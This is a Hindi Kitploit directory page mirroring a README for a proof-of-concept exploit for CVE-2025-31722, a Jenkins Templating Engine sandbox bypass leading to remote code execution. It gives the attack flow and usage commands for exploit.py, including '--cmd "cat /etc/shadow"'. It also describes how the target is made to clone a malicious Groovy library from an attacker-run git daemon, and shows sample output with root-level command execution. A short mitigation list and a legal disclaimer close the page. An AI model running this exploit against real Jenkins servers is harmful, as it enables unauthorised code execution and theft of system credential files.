Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-31722 — Jenkins Templating Engine प्लगइन सैंडबॉक्स बाईपास (CVE-2025-31722) के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण जो दुर्भावनापूर्ण Groovy लाइब्रेरी इंजेक्शन के माध्यम से दूरस्थ कोड निष्पादन सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/h3raklez/cve-2025-31722
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubh3raklez/cve-2025-31722

CVE-2025-31722

Jenkins Templating Engine प्लगइन सैंडबॉक्स बाईपास (CVE-2025-31722) के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण जो दुर्भावनापूर्ण Groovy लाइब्रेरी इंजेक्शन के माध्यम से दूरस्थ कोड निष्पादन सक्षम करता है।

रिपॉजिटरी देखें
346 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-31722 — जेनकिंस टेम्पलेटिंग इंजिन RCE

केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए।

विवरण

सैंडबॉक्स बाईपास कमजोरी Jenkins Templating Engine (JTE) प्लगइन <= 2.5.3 में जो एक निम्न-विशेषाधिकार उपयोगकर्ता को जेनकिंस सर्वर पर मनमाना कोड निष्पादित करने की अनुमति देती है।

यह दोष इसलिए होता है क्योंकि JTE फ़ोल्डर-स्तरीय GovernanceTier कॉन्फ़िगरेशन में परिभाषित बाहरी git रिपॉजिटरी से लाइब्रेरी लोड करता है और उन लाइब्रेरीज के चरणों को Groovy सैंडबॉक्स के बाहर निष्पादित करता है, भले ही जॉब बनाने वाले उपयोगकर्ता के विशेषाधिकार स्तर की परवाह किए बिना।

CVSS: 8.8 (उच्च)
प्रकार: सैंडबॉक्स बाईपास → RCE
प्रभावित घटक: pipeline-templating-engine प्लगइन ≤ 2.5.3
निश्चित संस्करण: 2.5.4+


हमला प्रवाह

root@kitploit:~
Attacker (Kali)                          Jenkins Server
───────────────                          ──────────────
1. Creates git repo with evil.groovy
2. Starts git daemon on :9418
3. Creates folder in Jenkins        →    Folder with GovernanceTier
   pointing to git://KALI:9418/…         pointing to attacker's repo
4. Creates job with AdHoc template  →    Job calls evil()
5. Triggers build                   →    JTE clones repo from Kali
                                         Executes evil() outside sandbox
                                    ←    RCE as Jenkins user

आवश्यकताएँ

जेनकिंस सर्वर (लक्ष्य)

  • जेनकिंस में Templating Engine 2.5.3 प्लगइन स्थापित
  • प्लगइन्स: cloudbees-folder, git, workflow-aggregator
  • CSRF अक्षम
  • उपयोगकर्ता attacker जिसके पास अनुमतियाँ: Item/READ, Item/CREATE, Item/CONFIGURE, Item/BUILD
  • बिल्ट-इन नोड ऑनलाइन कम से कम 1 निष्पादक के साथ
  • सर्वर से हमलावर के आईपी तक पोर्ट 9418 पर आउटबाउंड नेटवर्क कनेक्टिविटी

हमलावर मशीन (काली)

  • Python 3.8+
  • git स्थापित
  • पोर्ट 9418 जेनकिंस सर्वर से पहुँच योग्य
  • पायथन लाइब्रेरी: requests
root@kitploit:~
pip install requests

प्रयोगशाला सेटअप

डेबियन/उबंटू सर्वर पर स्थापित सेटअप में जेनकिंस स्थापित, उपयोगकर्ता, अनुमतियाँ और आवश्यक प्लगइन्स कॉन्फ़िगर किए गए थे। यह कोई दुर्भावनापूर्ण सामग्री नहीं बनाता — यह विशेष रूप से PoC द्वारा संभाला जाता है।


उपयोग

मूल शोषण

root@kitploit:~
python3 exploit.py \
  --url http://<JENKINS-IP>:8080 \
  --user attacker \
  --pass attacker123 \
  --git-host <KALI-IP>

कस्टम कमांड

root@kitploit:~
python3 exploit.py \
  --url http://<JENKINS-IP>:8080 \
  --user attacker \
  --pass attacker123 \
  --git-host <KALI-IP> \
  --cmd "cat /etc/shadow"

सफाई

root@kitploit:~
python3 exploit.py \
  --url http://<JENKINS-IP>:8080 \
  --user attacker \
  --pass attacker123 \
  --git-host <KALI-IP> \
  --cleanup

पैरामीटर

पैरामीटरविवरणआवश्यक
--urlजेनकिंस आधार URLहाँ
--userItem/CREATE+CONFIGURE+BUILD अनुमतियों वाला उपयोगकर्ताहाँ
--passउपयोगकर्ता पासवर्डहाँ
--git-hostजेनकिंस से पहुंचने योग्य काली आईपीहाँ
--cmdसर्वर पर निष्पादित करने का कमांड (डिफ़ॉल्ट: id && hostname && cat /etc/passwd)नहीं
--cleanupशोषण द्वारा बनाए गए फ़ोल्डर, जॉब और रिपॉजिटरी को हटाता हैनहीं

PoC कैसे काम करता है

  1. setup_repo() — काली पर ~/jte-exploit/evil-lib/steps/evil.groovy बनाता है जिसमें निष्पादित करने का कमांड होता है
  2. start_git_daemon() — काली पर पोर्ट 9418 पर git daemon शुरू करता है
  3. create_folder() — जेनकिंस में एक फ़ोल्डर बनाता है जिसमें GovernanceTier git://KALI:9418/jte-exploit की ओर इशारा करता है
  4. create_job() — AdHocTemplateFlowDefinition के साथ एक जॉब बनाता है जो evil-lib घोषित करता है और evil() को कॉल करता है
  5. trigger_and_wait() — बिल्ड ट्रिगर करता है और परिणाम की प्रतीक्षा करता है
  6. print_output() — RCE परिणाम के साथ कंसोल आउटपुट प्रदर्शित करता है

गिट डेमॉन पूरे बिल्ड चक्र के दौरान सक्रिय रहता है और बिल्ड पूरा होने पर स्वचालित रूप से समाप्त हो जाता है।


अपेक्षित आउटपुट

root@kitploit:~
=================================================================
  CVE-2025-31722 — Jenkins Templating Engine RCE
  Target  : http://10.211.55.10:8080
  Git host: 10.211.55.7
  Command : id && hostname && cat /etc/passwd
=================================================================

[+] Authenticated as: attacker (id=attacker)
[+] Repo created: /root/jte-exploit
[+] Malicious step: evil-lib/steps/evil.groovy
[+] Git daemon running at git://10.211.55.7:9418/jte-exploit
[+] Folder created
[+] Job created
[+] Build queued

=================================================================
  CVE-2025-31722 — RCE OUTPUT
=================================================================
[JTE] ...
uid=0(root) gid=0(root) groups=0(root)
debian
root:x:0:0:root:/root:/bin/bash
...
=================================================================

शमन

  • Templating Engine प्लगइन को संस्करण 2.5.4 या बाद में अपडेट करें
  • Item/CREATE और Item/CONFIGURE अनुमतियों को केवल विश्वसनीय उपयोगकर्ताओं तक सीमित करें
  • जेनकिंस में CSRF सुरक्षा सक्षम करें
  • बाहरी रिपॉजिटरी की ओर इशारा करने वाले GovernanceTier कॉन्फ़िगरेशन वाले फ़ोल्डरों का ऑडिट करें

संदर्भ

  • जेनकिंस सुरक्षा सलाहकार
  • JTE प्लगइन GitHub

कानूनी अस्वीकरण: यह PoC केवल शैक्षिक उद्देश्यों और नियंत्रित वातावरण में परीक्षण के लिए है। स्पष्ट प्राधिकरण के बिना सिस्टम के खिलाफ इसका उपयोग करना अवैध है।

टूल डाउनलोड करें